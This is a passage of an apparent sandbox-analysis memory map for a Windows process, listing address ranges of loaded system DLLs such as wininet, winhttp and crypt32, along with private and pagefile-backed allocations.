	        filename = "\\Windows\\SysWOW64\\profapi.dll" (normalized: "c:\\windows\\syswow64\\profapi.dll")

Region:
	              id = 1755
	        start_va = 0x76b60000
	          end_va = 0x76bf1fff
	     entry_point = 0x76b60000
	     region_type = mapped_file
	            name = "oleaut32.dll"
	        filename = "\\Windows\\SysWOW64\\oleaut32.dll" (normalized: "c:\\windows\\syswow64\\oleaut32.dll")

Region:
	              id = 1756
	        start_va = 0x771d0000
	          end_va = 0x772bafff
	     entry_point = 0x771d0000
	     region_type = mapped_file
	            name = "ole32.dll"
	        filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll")

Region:
	              id = 1757
	        start_va = 0x772e0000
	          end_va = 0x7730afff
	     entry_point = 0x772e0000
	     region_type = mapped_file
	            name = "imm32.dll"
	        filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll")

Region:
	              id = 1758
	        start_va = 0x77400000
	          end_va = 0x7748cfff
	     entry_point = 0x77400000
	     region_type = mapped_file
	            name = "shcore.dll"
	        filename = "\\Windows\\SysWOW64\\SHCore.dll" (normalized: "c:\\windows\\syswow64\\shcore.dll")

Region:
	              id = 1759
	        start_va = 0x510000
	          end_va = 0x511fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000000510000"
	        filename = ""

Region:
	              id = 1760
	        start_va = 0x530000
	          end_va = 0x531fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000000530000"
	        filename = ""

Region:
	              id = 1761
	        start_va = 0x540000
	          end_va = 0x541fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000000540000"
	        filename = ""

Region:
	              id = 1762
	        start_va = 0x550000
	          end_va = 0x553fff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000550000"
	        filename = ""

Region:
	              id = 1763
	        start_va = 0x2060000
	          end_va = 0x206ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000002060000"
	        filename = ""

Region:
	              id = 1764
	        start_va = 0x6f830000
	          end_va = 0x6fa3efff
	     entry_point = 0x6f830000
	     region_type = mapped_file
	            name = "comctl32.dll"
	        filename = "\\Windows\\WinSxS\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10586.0_none_d3c2e4e965da4528\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10586.0_none_d3c2e4e965da4528\\comctl32.dll")

Region:
	              id = 1765
	        start_va = 0x560000
	          end_va = 0x560fff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000560000"
	        filename = ""

Region:
	              id = 1766
	        start_va = 0x570000
	          end_va = 0x570fff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000570000"
	        filename = ""

Region:
	              id = 1767
	        start_va = 0x590000
	          end_va = 0x5c2fff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000590000"
	        filename = ""

Region:
	              id = 1768
	        start_va = 0x702b0000
	          end_va = 0x704bcfff
	     entry_point = 0x702b0000
	     region_type = mapped_file
	            name = "wininet.dll"
	        filename = "\\Windows\\SysWOW64\\wininet.dll" (normalized: "c:\\windows\\syswow64\\wininet.dll")

Region:
	              id = 1769
	        start_va = 0x772c0000
	          end_va = 0x772c5fff
	     entry_point = 0x772c0000
	     region_type = mapped_file
	            name = "psapi.dll"
	        filename = "\\Windows\\SysWOW64\\psapi.dll" (normalized: "c:\\windows\\syswow64\\psapi.dll")

Region:
	              id = 1770
	        start_va = 0x701e0000
	          end_va = 0x701f8fff
	     entry_point = 0x701e0000
	     region_type = mapped_file
	            name = "userenv.dll"
	        filename = "\\Windows\\SysWOW64\\userenv.dll" (normalized: "c:\\windows\\syswow64\\userenv.dll")

Region:
	              id = 1771
	        start_va = 0x70210000
	          end_va = 0x702aafff
	     entry_point = 0x70210000
	     region_type = mapped_file
	            name = "winhttp.dll"
	        filename = "\\Windows\\SysWOW64\\winhttp.dll" (normalized: "c:\\windows\\syswow64\\winhttp.dll")

Region:
	              id = 1772
	        start_va = 0x77490000
	          end_va = 0x774a2fff
	     entry_point = 0x77490000
	     region_type = mapped_file
	            name = "netapi32.dll"
	        filename = "\\Windows\\SysWOW64\\netapi32.dll" (normalized: "c:\\windows\\syswow64\\netapi32.dll")

Region:
	              id = 1773
	        start_va = 0x6ff70000
	          end_va = 0x6ff84fff
	     entry_point = 0x6ff70000
	     region_type = mapped_file
	            name = "samcli.dll"
	        filename = "\\Windows\\SysWOW64\\samcli.dll" (normalized: "c:\\windows\\syswow64\\samcli.dll")

Region:
	              id = 1799
	        start_va = 0x6ff60000
	          end_va = 0x6ff69fff
	     entry_point = 0x6ff60000
	     region_type = mapped_file
	            name = "secur32.dll"
	        filename = "\\Windows\\SysWOW64\\secur32.dll" (normalized: "c:\\windows\\syswow64\\secur32.dll")

Region:
	              id = 1800
	        start_va = 0x5d0000
	          end_va = 0x60ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000000005d0000"
	        filename = ""

Region:
	              id = 1801
	        start_va = 0x1f60000
	          end_va = 0x205ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000001f60000"
	        filename = ""

Region:
	              id = 1802
	        start_va = 0x2070000
	          end_va = 0x23a6fff
	     entry_point = 0x2070000
	     region_type = mapped_file
	            name = "sortdefault.nls"
	        filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls")

Region:
	              id = 1803
	        start_va = 0x23b0000
	          end_va = 0x23effff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000000023b0000"
	        filename = ""

Region:
	              id = 1804
	        start_va = 0x23f0000
	          end_va = 0x24effff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000000023f0000"
	        filename = ""

Region:
	              id = 1805
	        start_va = 0x24f0000
	          end_va = 0x252ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000000024f0000"
	        filename = ""

Region:
	              id = 1806
	        start_va = 0x2530000
	          end_va = 0x262ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000002530000"
	        filename = ""

Region:
	              id = 1807
	        start_va = 0x610000
	          end_va = 0x626fff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000610000"
	        filename = ""

Region:
	              id = 1808
	        start_va = 0x2630000
	          end_va = 0x272ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000002630000"
	        filename = ""

Region:
	              id = 1809
	        start_va = 0x71ea0000
	          end_va = 0x71eeefff
	     entry_point = 0x71ea0000
	     region_type = mapped_file
	            name = "mswsock.dll"
	        filename = "\\Windows\\SysWOW64\\mswsock.dll" (normalized: "c:\\windows\\syswow64\\mswsock.dll")

Region:
	              id = 1810
	        start_va = 0x5d0000
	          end_va = 0x60ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000000005d0000"
	        filename = ""

Region:
	              id = 1811
	        start_va = 0x1f60000
	          end_va = 0x205ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000001f60000"
	        filename = ""

Region:
	              id = 1812
	        start_va = 0x2730000
	          end_va = 0x276ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000002730000"
	        filename = ""

Region:
	              id = 1813
	        start_va = 0x2770000
	          end_va = 0x286ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000002770000"
	        filename = ""

Region:
	              id = 1814
	        start_va = 0x2870000
	          end_va = 0x28affff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000002870000"
	        filename = ""

Region:
	              id = 1815
	        start_va = 0x28b0000
	          end_va = 0x29affff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000000028b0000"
	        filename = ""

Region:
	              id = 1816
	        start_va = 0x29b0000
	          end_va = 0x29effff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000000029b0000"
	        filename = ""

Region:
	              id = 1817
	        start_va = 0x29f0000
	          end_va = 0x2aeffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000000029f0000"
	        filename = ""

Region:
	              id = 1818
	        start_va = 0x610000
	          end_va = 0x626fff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000610000"
	        filename = ""

Region:
	              id = 1819
	        start_va = 0x24f0000
	          end_va = 0x252ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000000024f0000"
	        filename = ""

Region:
	              id = 1820
	        start_va = 0x2530000
	          end_va = 0x262ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000002530000"
	        filename = ""

Region:
	              id = 1821
	        start_va = 0x2af0000
	          end_va = 0x2b2ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000002af0000"
	        filename = ""

Region:
	              id = 1822
	        start_va = 0x2b30000
	          end_va = 0x2c2ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000002b30000"
	        filename = ""

Region:
	              id = 1929
	        start_va = 0x610000
	          end_va = 0x626fff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000610000"
	        filename = ""

Region:
	              id = 1936
	        start_va = 0x610000
	          end_va = 0x626fff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000610000"
	        filename = ""

Region:
	              id = 1937
	        start_va = 0x610000
	          end_va = 0x626fff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000610000"
	        filename = ""

Region:
	              id = 1938
	        start_va = 0x610000
	          end_va = 0x626fff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000610000"
	        filename = ""

Region:
	              id = 1957
	        start_va = 0x610000
	          end_va = 0x626fff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000610000"
	        filename = ""

Region:
	              id = 1958
	        start_va = 0x610000
	          end_va = 0x626fff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000610000"
	        filename = ""

Region:
	              id = 1960
	        start_va = 0x610000
	          end_va = 0x626fff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000610000"
	        filename = ""

Region:
	              id = 1976
	        start_va = 0x610000
	          end_va = 0x626fff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000610000"
	        filename = ""

Region:
	              id = 2041
	        start_va = 0x610000
	          end_va = 0x626fff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000610000"
	        filename = ""

Region:
	              id = 2235
	        start_va = 0x610000
	          end_va = 0x626fff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000610000"
	        filename = ""

Region:
	              id = 2334
	        start_va = 0x721f0000
	          end_va = 0x724bafff
	     entry_point = 0x721f0000
	     region_type = mapped_file
	            name = "iertutil.dll"
	        filename = "\\Windows\\SysWOW64\\iertutil.dll" (normalized: "c:\\windows\\syswow64\\iertutil.dll")

Region:
	              id = 2335
	        start_va = 0x610000
	          end_va = 0x610fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000000610000"
	        filename = ""

Region:
	              id = 2336
	        start_va = 0x620000
	          end_va = 0x620fff
	     entry_point = 0x620000
	     region_type = mapped_file
	            name = "counters.dat"
	        filename = "\\Users\\Nd9E1FYi\\AppData\\Local\\Microsoft\\Windows\\INetCache\\counters.dat" (normalized: "c:\\users\\nd9e1fyi\\appdata\\local\\microsoft\\windows\\inetcache\\counters.dat")

Region:
	              id = 2337
	        start_va = 0x70b90000
	          end_va = 0x70ba1fff
	     entry_point = 0x70b90000
	     region_type = mapped_file
	            name = "ondemandconnroutehelper.dll"
	        filename = "\\Windows\\SysWOW64\\OnDemandConnRouteHelper.dll" (normalized: "c:\\windows\\syswow64\\ondemandconnroutehelper.dll")

Region:
	              id = 2338
	        start_va = 0x23b0000
	          end_va = 0x23effff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000000023b0000"
	        filename = ""

Region:
	              id = 2339
	        start_va = 0x23f0000
	          end_va = 0x24effff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000000023f0000"
	        filename = ""

Region:
	              id = 2340
	        start_va = 0x2c30000
	          end_va = 0x2c46fff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000002c30000"
	        filename = ""

Region:
	              id = 2372
	        start_va = 0x70200000
	          end_va = 0x70207fff
	     entry_point = 0x70200000
	     region_type = mapped_file
	            name = "winnsi.dll"
	        filename = "\\Windows\\SysWOW64\\winnsi.dll" (normalized: "c:\\windows\\syswow64\\winnsi.dll")

Region:
	              id = 2373
	        start_va = 0x774b0000
	          end_va = 0x774b6fff
	     entry_point = 0x774b0000
	     region_type = mapped_file
	            name = "nsi.dll"
	        filename = "\\Windows\\SysWOW64\\nsi.dll" (normalized: "c:\\windows\\syswow64\\nsi.dll")

Region:
	              id = 2374
	        start_va = 0x6ff20000
	          end_va = 0x6ff32fff
	     entry_point = 0x6ff20000
	     region_type = mapped_file
	            name = "samlib.dll"
	        filename = "\\Windows\\SysWOW64\\samlib.dll" (normalized: "c:\\windows\\syswow64\\samlib.dll")

Region:
	              id = 2375
	        start_va = 0x2c30000
	          end_va = 0x2c46fff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000002c30000"
	        filename = ""

Region:
	              id = 2408
	        start_va = 0x2c30000
	          end_va = 0x2c6ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000002c30000"
	        filename = ""

Region:
	              id = 2409
	        start_va = 0x2c70000
	          end_va = 0x2d6ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000002c70000"
	        filename = ""

Region:
	              id = 2411
	        start_va = 0x2d70000
	          end_va = 0x2daffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000002d70000"
	        filename = ""

Region:
	              id = 2412
	        start_va = 0x2db0000
	          end_va = 0x2eaffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000002db0000"
	        filename = ""

Region:
	              id = 2413
	        start_va = 0x2eb0000
	          end_va = 0x2ec6fff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000002eb0000"
	        filename = ""

Region:
	              id = 2448
	        start_va = 0x71d60000
	          end_va = 0x71de3fff
	     entry_point = 0x71d60000
	     region_type = mapped_file
	            name = "dnsapi.dll"
	        filename = "\\Windows\\SysWOW64\\dnsapi.dll" (normalized: "c:\\windows\\syswow64\\dnsapi.dll")

Region:
	              id = 2449
	        start_va = 0x704c0000
	          end_va = 0x7063dfff
	     entry_point = 0x704c0000
	     region_type = mapped_file
	            name = "urlmon.dll"
	        filename = "\\Windows\\SysWOW64\\urlmon.dll" (normalized: "c:\\windows\\syswow64\\urlmon.dll")

Region:
	              id = 2450
	        start_va = 0x630000
	          end_va = 0x630fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000000630000"
	        filename = ""

Region:
	              id = 2451
	        start_va = 0x2eb0000
	          end_va = 0x2ec6fff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000002eb0000"
	        filename = ""

Region:
	              id = 2452
	        start_va = 0x2ed0000
	          end_va = 0x2f0ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000002ed0000"
	        filename = ""

Region:
	              id = 2453
	        start_va = 0x2f10000
	          end_va = 0x300ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000002f10000"
	        filename = ""

Region:
	              id = 2483
	        start_va = 0x2eb0000
	          end_va = 0x2ec6fff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000002eb0000"
	        filename = ""

Region:
	              id = 2485
	        start_va = 0x2eb0000
	          end_va = 0x2ec6fff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000002eb0000"
	        filename = ""

Region:
	              id = 2507
	        start_va = 0x2eb0000
	          end_va = 0x2ec6fff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000002eb0000"
	        filename = ""

Region:
	              id = 2511
	        start_va = 0x2eb0000
	          end_va = 0x2eb0fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000002eb0000"
	        filename = ""

Region:
	              id = 2512
	        start_va = 0x3010000
	          end_va = 0x304ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000003010000"
	        filename = ""

Region:
	              id = 2513
	        start_va = 0x3050000
	          end_va = 0x314ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000003050000"
	        filename = ""

Region:
	              id = 2514
	        start_va = 0x3150000
	          end_va = 0x318ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000003150000"
	        filename = ""

Region:
	              id = 2515
	        start_va = 0x3190000
	          end_va = 0x328ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000003190000"
	        filename = ""

Region:
	              id = 2516
	        start_va = 0x3290000
	          end_va = 0x32a6fff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000003290000"
	        filename = ""

Region:
	              id = 2517
	        start_va = 0x77310000
	          end_va = 0x77393fff
	     entry_point = 0x77310000
	     region_type = mapped_file
	            name = "clbcatq.dll"
	        filename = "\\Windows\\SysWOW64\\clbcatq.dll" (normalized: "c:\\windows\\syswow64\\clbcatq.dll")

Region:
	              id = 2520
	        start_va = 0x3290000
	          end_va = 0x32cffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000003290000"
	        filename = ""

Region:
	              id = 2521
	        start_va = 0x32d0000
	          end_va = 0x33cffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000000032d0000"
	        filename = ""

Region:
	              id = 2522
	        start_va = 0x33d0000
	          end_va = 0x33e6fff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000000033d0000"
	        filename = ""

Region:
	              id = 2523
	        start_va = 0x71cd0000
	          end_va = 0x71d16fff
	     entry_point = 0x71cd0000
	     region_type = mapped_file
	            name = "fwpuclnt.dll"
	        filename = "\\Windows\\SysWOW64\\FWPUCLNT.DLL" (normalized: "c:\\windows\\syswow64\\fwpuclnt.dll")

Region:
	              id = 2524
	        start_va = 0x74330000
	          end_va = 0x7434afff
	     entry_point = 0x74330000
	     region_type = mapped_file
	            name = "bcrypt.dll"
	        filename = "\\Windows\\SysWOW64\\bcrypt.dll" (normalized: "c:\\windows\\syswow64\\bcrypt.dll")

Region:
	              id = 2527
	        start_va = 0x2ec0000
	          end_va = 0x2ec1fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000002ec0000"
	        filename = ""

Region:
	              id = 2528
	        start_va = 0x33d0000
	          end_va = 0x33d0fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000033d0000"
	        filename = ""

Region:
	              id = 2529
	        start_va = 0x33e0000
	          end_va = 0x37dafff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000033e0000"
	        filename = ""

Region:
	              id = 2530
	        start_va = 0x37e0000
	          end_va = 0x37f6fff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000000037e0000"
	        filename = ""

Region:
	              id = 2531
	        start_va = 0x71d20000
	          end_va = 0x71d27fff
	     entry_point = 0x71d20000
	     region_type = mapped_file
	            name = "rasadhlp.dll"
	        filename = "\\Windows\\SysWOW64\\rasadhlp.dll" (normalized: "c:\\windows\\syswow64\\rasadhlp.dll")

Region:
	              id = 2542
	        start_va = 0x70120000
	          end_va = 0x70183fff
	     entry_point = 0x70120000
	     region_type = mapped_file
	            name = "schannel.dll"
	        filename = "\\Windows\\SysWOW64\\schannel.dll" (normalized: "c:\\windows\\syswow64\\schannel.dll")

Region:
	              id = 2543
	        start_va = 0x77050000
	          end_va = 0x771c7fff
	     entry_point = 0x77050000
	     region_type = mapped_file
	            name = "crypt32.dll"
	        filename = "\\Windows\\SysWOW64\\crypt32.dll" (normalized: "c:\\windows\\syswow64\\crypt32.dll")

Region:
	              id = 2544
	        start_va = 0x772d0000
	          end_va = 0x772ddfff
	     entry_point = 0x772d0000
	     region_type = mapped_file
	            name = "msasn1.dll"
	        filename = "\\Windows\\SysWOW64\\msasn1.dll" (normalized: "c:\\windows\\syswow64\\msasn1.dll")

Region:
	              id = 2545
	        start_va = 0x37e0000
	          end_va = 0x37f6fff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000000037e0000"
	        filename = ""

Region:
	              id = 2546
	        start_va = 0x37e0000
	          end_va = 0x37f6fff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000000037e0000"
	        filename = ""

Region:
	              id = 2547
	        start_va = 0x37e0000
	          end_va = 0x37e0fff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000000037e0000"
	        filename = ""

Region:
	              id = 2548
	        start_va = 0x37f0000
	          end_va = 0x3806fff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000000037f0000"
	        filename = ""

Region:
	              id = 2550
	        start_va = 0x37e0000
	          end_va = 0x37f6fff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000000037e0000"
	        filename = ""

Region:
	              id = 2551
	        start_va = 0x700c0000
	          end_va = 0x700ebfff
	     entry_point = 0x700c0000
	     region_type = mapped_file
	            name = "ntasn1.dll"
	        filename = "\\Windows\\SysWOW64\\ntasn1.dll" (normalized: "c:\\windows\\syswow64\\ntasn1.dll")

Region:
	              id = 2552
	        start_va = 0x700f0000
	          end_va = 0x7010ffff
	     entry_point = 0x700f0000
	     region_type = mapped_file
	            name = "ncrypt.dll"
	        filename = "\\Windows\\SysWOW64\\ncrypt.dll" (normalized: "c:\\windows\\syswow64\\ncrypt.dll")

Region:
	              id = 2553
	        start_va = 0x70110000
	          end_va = 0x7011ffff
	     entry_point = 0x70110000
	     region_type = mapped_file
	            name = "mskeyprotect.dll"
	        filename = "\\Windows\\SysWOW64\\mskeyprotect.dll" (normalized: "c:\\windows\\syswow64\\mskeyprotect.dll")

Region:
	              id = 2554
	        start_va = 0x76c00000
	          end_va = 0x76c41fff
	     entry_point = 0x76c00000
	     region_type = mapped_file
	            name = "wintrust.dll"
	        filename = "\\Windows\\SysWOW64\\wintrust.dll" (normalized: "c:\\windows\\syswow64\\wintrust.dll")

Region:
	              id = 2555
	        start_va = 0x70070000
	          end_va = 0x70082fff
	     entry_point = 0x70070000
	     region_type = mapped_file
	            name = "cryptsp.dll"
	        filename = "\\Windows\\SysWOW64\\cryptsp.dll" (normalized: "c:\\windows\\syswow64\\cryptsp.dll")

Region:
	              id = 2556
	        start_va = 0x70040000
	          end_va = 0x7006efff
	     entry_point = 0x70040000
	     region_type = mapped_file
	            name = "rsaenh.dll"
	        filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll")

Region:
	              id = 2557
	        start_va = 0x37e0000
	          end_va = 0x381ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000000037e0000"
	        filename = ""

Region:
	              id = 2558
	        start_va = 0x3820000
	          end_va = 0x391ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000003820000"
	        filename = ""

Region:
	              id = 2559
	        start_va = 0x3920000
	          end_va = 0x3936fff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000003920000"
	        filename = ""

Region:
	              id = 2560
	        start_va = 0x3920000
	          end_va = 0x3a1ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000003920000"
	        filename = ""

Region:
	              id = 2561
	        start_va = 0x3a20000
	          end_va = 0x3a36fff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000003a20000"
	        filename = ""

Region:
	              id = 2563
	        start_va = 0x6fe80000
	          end_va = 0x6fe9efff
	     entry_point = 0x6fe80000
	     region_type = mapped_file
	            name = "gpapi.dll"
	        filename = "\\Windows\\SysWOW64\\gpapi.dll" (normalized: "c:\\windows\\syswow64\\gpapi.dll")

Region:
	              id = 2566
	        start_va = 0x3a20000
	          end_va = 0x3a36fff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000003a20000"
	        filename = ""

Region:
	              id = 2568
	        start_va = 0x3a20000
	          end_va = 0x3c1ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000003a20000"
	        filename = ""

Region:
	              id = 2569
	        start_va = 0x3c20000
	          end_va = 0x3c36fff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000003c20000"
	        filename = ""

Region:
	              id = 2570
	        start_va = 0x700a0000
	          end_va = 0x700b9fff
	     entry_point = 0x700a0000
	     region_type = mapped_file
	            name = "ncryptsslp.dll"
	        filename = "\\Windows\\SysWOW64\\ncryptsslp.dll" (normalized: "c:\\windows\\syswow64\\ncryptsslp.dll")

Region:
	              id = 2571
	        start_va = 0x3c20000
	          end_va = 0x3c36fff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000003c20000"
	        filename = ""

Region:
	              id = 2586
	        start_va = 0x3c20000
	          end_va = 0x3c36fff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000003c20000"
	        filename = ""

Region:
	              id = 2827
	        start_va = 0x3c20000
	          end_va = 0x3c36fff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000003c20000"
	        filename = ""

Region:
	              id = 2828
	        start_va = 0x3c20000
	          end_va = 0x3c36fff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000003c20000"
	        filename = ""

Region:
	              id = 2829
	        start_va = 0x3c20000
	          end_va = 0x3c36fff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000003c20000"
	        filename = ""

Region:
	              id = 2830
	        start_va = 0x3c20000
	          end_va = 0x3c37fff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000003c20000"
	        filename = ""

Region:
	              id = 2831
	        start_va = 0x3c20000
	          end_va = 0x3c37fff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000003c20000"
	        filename = ""

Region:
	              id = 2856
	        start_va = 0x3c20000
	          end_va = 0x3c37fff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000003c20000"
	        filename = ""

Region:
	              id = 3039
	        start_va = 0x3c20000
	          end_va = 0x3c36fff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000003c20000"
	        filename = ""

Region:
	              id = 3428
	        start_va = 0x3c20000
	          end_va = 0x3c36fff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000003c20000"
	        filename = ""

Region:
	              id = 4094
	        start_va = 0x3c20000
	          end_va = 0x3c36fff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000003c20000"
	        filename = ""

Region:
	              id = 4313
	        start_va = 0x3c20000
	          end_va = 0x3c37fff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000003c20000"
	        filename = ""

Region:
	              id = 4314
	        start_va = 0x3c20000
	          end_va = 0x3c37fff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000003c20000"
	        filename = ""

Region:
	              id = 4318
	        start_va = 0x3c20000
	          end_va = 0x3c37fff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000003c20000"
	        filename = ""

Region:
	              id = 4340
	        start_va = 0x3c20000
	          end_va = 0x3c37fff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000003c20000"
	        filename = ""

Region:
	              id = 4348
	        start_va = 0x3c20000
	          end_va = 0x3c37fff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000003c20000"
	        filename = ""

Region:
	              id = 4357
	        start_va = 0x3c20000
	          end_va = 0x3c37fff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000003c20000"
	        filename = ""

Region:
	              id = 4365
	        start_va = 0x3c20000
	          end_va = 0x3c37fff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000003c20000"
	        filename = ""

Region:
	              id = 4371
	        start_va = 0x3c20000
	          end_va = 0x3c36fff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000003c20000"
	        filename = ""

Region:
	              id = 4375
	        start_va = 0x3c20000
	          end_va = 0x3c36fff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000003c20000"
	        filename = ""

Region:
	              id = 4397
	        start_va = 0x3c20000
	          end_va = 0x3c36fff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000003c20000"
	        filename = ""

Region:
	              id = 4404
	        start_va = 0x3c20000
	          end_va = 0x3c36fff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000003c20000"
	        filename = ""

Region:
	              id = 4407
	        start_va = 0x3c20000
	          end_va = 0x3c36fff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000003c20000"
	        filename = ""

Region:
	              id = 4409
	        start_va = 0x3c20000
	          end_va = 0x3c36fff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000003c20000"
	        filename = ""

Region:
	              id = 4445
	        start_va = 0x3c20000
	          end_va = 0x3c36fff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000003c20000"
	        filename = ""

Region:
	              id = 4464
	        start_va = 0x3c20000
	          end_va = 0x3c36fff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000003c20000"
	        filename = ""

Region:
	              id = 4468
	        start_va = 0x3c20000
	          end_va = 0x3c36fff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000003c20000"
	        filename = ""

Region:
	              id = 4469
	        start_va = 0x3c20000
	          end_va = 0x3c36fff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000003c20000"
	        filename = ""

Region:
	              id = 4470
	        start_va = 0x3c20000
	          end_va = 0x3c36fff
	     entry_point = 0x0
	     region_type = private
